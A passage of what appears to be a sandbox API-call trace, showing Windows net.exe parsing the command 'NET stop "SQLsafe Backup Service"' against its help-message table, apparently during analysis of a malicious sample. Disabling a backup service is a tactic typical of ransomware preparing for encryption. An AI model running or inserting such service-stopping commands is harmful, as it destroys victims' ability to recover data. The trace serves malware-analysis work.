[0207.229] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x1b [0207.229] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x25) returned 13 [0207.229] LocalFree (hMem=0x445638) returned 0x0 [0207.229] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xbe [0207.229] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text", _MaxCount=0x25) returned 12 [0207.229] LocalFree (hMem=0x445638) returned 0x0 [0207.229] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x33 [0207.229] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET com", _MaxCount=0x25) returned 11 [0207.229] LocalFree (hMem=0x445638) returned 0x0 [0207.229] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x19 [0207.229] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x25) returned 11 [0207.229] LocalFree (hMem=0x445638) returned 0x0 [0207.229] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xc1 [0207.229] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:", _MaxCount=0x25) returned 7 [0207.229] LocalFree (hMem=0x445638) returned 0x0 [0207.229] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x16 [0207.229] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x25) returned 3 [0207.229] LocalFree (hMem=0x445638) returned 0x0 [0207.229] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x33 [0207.229] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELET", _MaxCount=0x25) returned 15 [0207.229] LocalFree (hMem=0x445638) returned 0x0 [0207.229] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x234 [0207.230] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n share", _MaxCount=0x25) returned 12 [0207.230] LocalFree (hMem=0x445638) returned 0x0 [0207.230] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x13 [0207.230] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x25) returned 14 [0207.230] LocalFree (hMem=0x445638) returned 0x0 [0207.230] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x14 [0207.230] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x25) returned 14 [0207.230] LocalFree (hMem=0x445638) returned 0x0 [0207.230] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x14 [0207.230] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x25) returned 14 [0207.230] LocalFree (hMem=0x445638) returned 0x0 [0207.230] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x15 [0207.230] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x25) returned 14 [0207.230] LocalFree (hMem=0x445638) returned 0x0 [0207.230] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x15 [0207.230] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x25) returned 14 [0207.230] LocalFree (hMem=0x445638) returned 0x0 [0207.230] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x16 [0207.230] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x25) returned 14 [0207.230] LocalFree (hMem=0x445638) returned 0x0 [0207.230] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x11 [0207.230] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x25) returned 14 [0207.230] LocalFree (hMem=0x445638) returned 0x0 [0207.230] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x14 [0207.230] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x25) returned 14 [0207.230] LocalFree (hMem=0x445638) returned 0x0 [0207.230] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x12 [0207.230] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x25) returned 14 [0207.231] LocalFree (hMem=0x445638) returned 0x0 [0207.231] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xf [0207.231] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x25) returned 14 [0207.231] LocalFree (hMem=0x445638) returned 0x0 [0207.231] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x17 [0207.231] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x25) returned 14 [0207.231] LocalFree (hMem=0x445638) returned 0x0 [0207.231] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x18 [0207.231] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x25) returned 14 [0207.231] LocalFree (hMem=0x445638) returned 0x0 [0207.231] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x2a [0207.231] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER", _MaxCount=0x25) returned 14 [0207.231] LocalFree (hMem=0x445638) returned 0x0 [0207.231] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x15 [0207.231] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x25) returned 19 [0207.231] LocalFree (hMem=0x445638) returned 0x0 [0207.231] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x58 [0207.231] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN", _MaxCount=0x25) returned -1 [0207.231] LocalFree (hMem=0x445638) returned 0x0 [0207.231] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x184 [0207.231] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\computer", _MaxCount=0x25) returned -2 [0207.231] LocalFree (hMem=0x445638) returned 0x0 [0207.231] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xc7 [0207.231] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET USER\r\n[username [password | *] [o", _MaxCount=0x25) returned -2 [0207.231] LocalFree (hMem=0x445638) returned 0x0 [0207.231] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x47 [0207.231] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | ", _MaxCount=0x25) returned -3 [0207.231] LocalFree (hMem=0x445638) returned 0x0 [0207.231] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xc2 [0207.231] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONF", _MaxCount=0x25) returned 19 [0207.231] LocalFree (hMem=0x445638) returned 0x0 [0207.231] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x319 [0207.231] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be used to st", _MaxCount=0x25) returned -5 [0207.231] LocalFree (hMem=0x445638) returned 0x0 [0207.231] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x483 [0207.231] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventions are", _MaxCount=0x25) returned -5 [0207.232] LocalFree (hMem=0x445638) returned 0x0 [0207.232] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xa86 [0207.232] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NAMES\r\nThe following types of names a", _MaxCount=0x25) returned 4 [0207.232] LocalFree (hMem=0x445638) returned 0x0 [0207.232] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x54 [0207.232] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="\r\nFor more information on tools see t", _MaxCount=0x25) returned 97 [0207.232] LocalFree (hMem=0x445638) returned 0x0 [0207.232] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xad [0207.232] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET ACCOUNTS\r\n[/FORCELOGOF", _MaxCount=0x1a) returned 18 [0207.232] LocalFree (hMem=0x445638) returned 0x0 [0207.232] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x2e [0207.232] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET COMPUTER\r\n\\\\computerna", _MaxCount=0x1a) returned 16 [0207.232] LocalFree (hMem=0x445638) returned 0x0 [0207.232] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x7d [0207.232] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET CONFIG SERVER\r\n[/AUTOD", _MaxCount=0x1a) returned 16 [0207.232] LocalFree (hMem=0x445638) returned 0x0 [0207.232] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x26 [0207.232] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET CONFIG\r\n[SERVER | WORK", _MaxCount=0x1a) returned 16 [0207.232] LocalFree (hMem=0x445638) returned 0x0 [0207.232] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x19 [0207.232] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1a) returned 16 [0207.232] LocalFree (hMem=0x445638) returned 0x0 [0207.232] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x1b [0207.232] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r", _MaxCount=0x1a) returned 13 [0207.232] LocalFree (hMem=0x445638) returned 0x0 [0207.232] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xbe [0207.232] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET GROUP\r\n[groupname [/CO", _MaxCount=0x1a) returned 12 [0207.232] LocalFree (hMem=0x445638) returned 0x0 [0207.232] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x33 [0207.233] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET HELP\r\ncommand\r\n -o", _MaxCount=0x1a) returned 11 [0207.233] LocalFree (hMem=0x445638) returned 0x0 [0207.233] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x19 [0207.233] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1a) returned 11 [0207.233] LocalFree (hMem=0x445638) returned 0x0 [0207.233] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xc1 [0207.233] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET LOCALGROUP\r\n[groupname", _MaxCount=0x1a) returned 7 [0207.233] LocalFree (hMem=0x445638) returned 0x0 [0207.233] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x16 [0207.233] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1a) returned 3 [0207.233] LocalFree (hMem=0x445638) returned 0x0 [0207.233] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x33 [0207.233] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET SESSION\r\n[\\\\computerna", _MaxCount=0x1a) returned 15 [0207.233] LocalFree (hMem=0x445638) returned 0x0 [0207.233] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x234 [0207.233] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1a) returned 12 [0207.233] LocalFree (hMem=0x445638) returned 0x0 [0207.233] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x13 [0207.233] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET START BROWSER\r\n", _MaxCount=0x1a) returned 14 [0207.233] LocalFree (hMem=0x445638) returned 0x0 [0207.233] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x14 [0207.233] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1a) returned 14 [0207.233] LocalFree (hMem=0x445638) returned 0x0 [0207.233] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x14 [0207.233] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1a) returned 14 [0207.233] LocalFree (hMem=0x445638) returned 0x0 [0207.233] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x15 [0207.233] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET START MESSENGER\r\n", _MaxCount=0x1a) returned 14 [0207.233] LocalFree (hMem=0x445638) returned 0x0 [0207.233] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x15 [0207.233] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET START NET LOGON\r\n", _MaxCount=0x1a) returned 14 [0207.233] LocalFree (hMem=0x445638) returned 0x0 [0207.233] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x16 [0207.233] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1a) returned 14 [0207.234] LocalFree (hMem=0x445638) returned 0x0 [0207.234] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x11 [0207.234] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET START RPCSS\r\n", _MaxCount=0x1a) returned 14 [0207.234] LocalFree (hMem=0x445638) returned 0x0 [0207.234] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x14 [0207.234] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1a) returned 14 [0207.234] LocalFree (hMem=0x445638) returned 0x0 [0207.234] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x12 [0207.234] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET START SERVER\r\n", _MaxCount=0x1a) returned 14 [0207.234] LocalFree (hMem=0x445638) returned 0x0 [0207.234] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xf [0207.234] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET START UPS\r\n", _MaxCount=0x1a) returned 14 [0207.234] LocalFree (hMem=0x445638) returned 0x0 [0207.234] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x17 [0207.234] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1a) returned 14 [0207.234] LocalFree (hMem=0x445638) returned 0x0 [0207.234] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x18 [0207.234] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1a) returned 14 [0207.234] LocalFree (hMem=0x445638) returned 0x0 [0207.234] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x2a [0207.234] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET STATISTICS\r\n[WORKSTATI", _MaxCount=0x1a) returned 14 [0207.234] LocalFree (hMem=0x445638) returned 0x0 [0207.234] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x15 [0207.234] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1a) returned 19 [0207.234] LocalFree (hMem=0x445638) returned 0x0 [0207.234] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x58 [0207.234] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET TIME\r\n\r\n[\\\\computernam", _MaxCount=0x1a) returned -1 [0207.234] LocalFree (hMem=0x445638) returned 0x0 [0207.234] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x184 [0207.234] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET USE\r\n[devicename | *] ", _MaxCount=0x1a) returned -2 [0207.234] LocalFree (hMem=0x445638) returned 0x0 [0207.234] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xc7 [0207.234] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET USER\r\n[username [passw", _MaxCount=0x1a) returned -2 [0207.234] LocalFree (hMem=0x445638) returned 0x0 [0207.234] FormatMessageW (in: 